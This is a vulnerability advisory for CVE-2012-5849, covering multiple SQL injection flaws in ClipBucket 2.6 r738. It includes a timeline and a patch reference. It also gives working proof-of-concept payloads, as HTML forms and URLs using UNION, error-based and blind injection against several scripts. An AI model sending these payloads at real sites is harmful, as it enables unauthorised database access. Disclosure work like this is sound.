ClipBucket 2.6 Revision 738 SQL Injection Vulnerability

Product: ClipBucket
Vendor: clip-bucket.com
Vulnerable Version(s): 2.6 Revision 738 and probably prior
Tested Version: 2.6 Revision 738
Vendor Notification: November 7, 2012 
Vendor Patch: November 28, 2012 
Public Disclosure: December 5, 2012 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5849
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to perform SQL Injection attacks.


1) Multiple SQL Injections in ClipBucket: CVE-2012-5849

1.1 The vulnerability exists due to improper sanitation of input in multiple parameters within the "/ajax.php" script. A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL queries in application’s database. The following parameter are vulnerable to SQL injection attacks:

 - "uid" (when "mode" is set to "add_friend"). This vulnerability require that attacker is logged-in into the application, however new user registration is open by default ;
 - "id" (when "mode" is set to "share_object" or "add_to_fav", and "type" is set to "video", "photo", or "collection");
 - "id" (when "mode" is set to "rating" and "type" is set to "video", "photo", "collection", or "user"). This vulnerabilities require that attacker is logged-in into the application, however new user registration is open by default;
 - "id" (when "mode" is set to "flag_object" and "type" is set to "video", "group", "user", "photo", or "collection");
 - "cid" (when "mode" is set to "add_new_item" or "remove_collection_item" and "type" is set to "video" or "photo");
 - "cid" (when "mode" is set to "remove_collection_item" and "type" is set to "videos" or "photos");
 - "cid" (when "mode" is set to "get_item" or "load_more_items" and "type" is set to "videos" or "photos");
 - "ci_id" (when "mode" is set to "get_item" and "type" is set to "videos" or "photos").

The following PoC (Proof-of-Concept) codes demonstrate the vulnerabilities.

PoC 1:

<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="add_friend" />
<input type="hidden" name="uid" value="' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10 -- " />
<input type="submit" id="btn">
</form>


PoC 2:

<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="get_item" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="hidden" name="ci_id" value="" />
<input type="submit" id="btn">
</form>


PoC 3:

<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="get_item" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="" />
<input type="hidden" name="ci_id" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit" id="btn">
</form>


PoC 4:

<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="load_more_items" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit" id="btn">
</form>


The second type of PoC code uses error-based SQL injection technique to display SQL server version:


<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="rating" />
<input type="hidden" name="type" value="[video|photo|collection|user]" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="id" value="-1 OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>


The third PoC code demonstrates vulnerability exploitation by blind SQL injection technique:


<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="share_object" />
<input type="hidden" name="type" value="video" />
<input type="hidden" name="id" value="0 OR version()>='5' -- " />
<input type="submit" id="btn">
</form>


If application uses MySQL server version 5 or greater, the result of the above-mentioned HTTP request will be a message saying: "You are not logged in" or "Please enter usernames or emails to send this video".


1.2 The vulnerability was discovered in the "/user_contacts.php" script while handling the "user" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. 

The following PoC demonstrates the vulnerability: 

http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202


1.3 The vulnerability was discovered in the "/view_channel.php" script while handling the "user" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.

The following PoC demonstrates the vulnerability: 

http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202


1.4 The vulnerability exists due to an error in the "view_page.php" script while handling the "pid" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.

The following PoC demonstrates the vulnerability: 

http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202


1.5 The vulnerability was discovered in the "view_topic.php" script while handling the "tid" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.

The following PoC demonstrates the vulnerability: 

http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202 


1.6 The vulnerability was discovered in the "/watch_video.php" script while handling the "v" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.


Notice: some of the above-mentioned vulnerabilities were described in Secunia Advisory https://secunia.com/advisories/47474/ for the previous versions of ClipBucket, however they were not fixed in the tested version. 


-----------------------------------------------------------------------------------------------

Solution:

Apply CB SQL Injection Fix 11282012 patch or upgrade to ClipBucket 2.6 r738 with security fixes (clipbucket-2.6-r738-security-fixed-p2).

More Information:
http://forums.clip-bucket.com/showthread.php?12527-Security-Fix-ClipBucket-2-6-SQL-Injections-fix-%28Updated%29
http://sourceforge.net/projects/clipbucket/files/Patches/
http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/

-----------------------------------------------------------------------------------------------

#  0day.today [2018-02-15]  #